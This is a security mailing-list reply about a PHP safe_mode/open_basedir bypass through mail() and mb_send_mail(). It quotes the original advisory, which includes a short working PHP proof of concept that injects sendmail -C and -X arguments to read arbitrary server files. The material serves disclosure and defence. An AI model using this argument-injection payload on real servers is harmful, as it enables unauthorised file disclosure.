Re: (PHP) mb_send_mail security bypass

[Yasuo Ohgaki <yohgaki () ohgaki net>]

You should check mail() also...

mail() has exactly the same issue, since both mail() and mb_send_mail() applies
php_escape_shell_cmd() to 5th parameter.

Since the PoC is feeding usual options to sendmail command, php_escape_shell_cmd()
is useless for this kind of code.

Solution:
DO NOT TRUST safe_mode and open_basedir, since they are *FAIL* safe features for script bugs.
Safe_mode and open_basedir are not for the protection against PHP code writers.

By the way, php_escape_shell_cmd() is not applied to force_extra_parameter php.ini setting.
(force_extra_paremeter is INI_PERDIR|INI_SYSTEM setting)
Attackers can do much more with this feature if one would like to.

-- 
Yasuo Ohgaki


ced.clerget () free fr wrote:
> Vulnerable: PHP4, PHP5
> with use of sendmail 8.13.4 ><
>
> When safemode disabled and open_basedir restriction in effect, we can pass extra parameters
> to sendmail command in mail function, especially the -C and -X arguments.
> -C for alternate configuration file
> -X to log all in a file
> Can be used to view files, pass the file to view to C argument and store content in file
> passed to X argument.
>
> When safemode enabled and open_basedir restriction in effect, we can pass extra parameters
> to sendmail command in mb_send_mail function.
>
> Solution:
> Use other sendmail command and don't allow extra parameters for mb_send_mail when safemode enabled
>
> <?php
>         if (isset($_REQUEST['file'])) {
>                 $file = "sendlog";
>                 if (file_exists($file)) unlink($file);
>                 $extra = "-C ".$_REQUEST['file']." -X ".getcwd()."/".$file;
>                 mb_send_mail(NULL, NULL, NULL, NULL, $extra);
>                 echo "<pre>".file_get_contents($file)."</pre>";
>         }
> ?>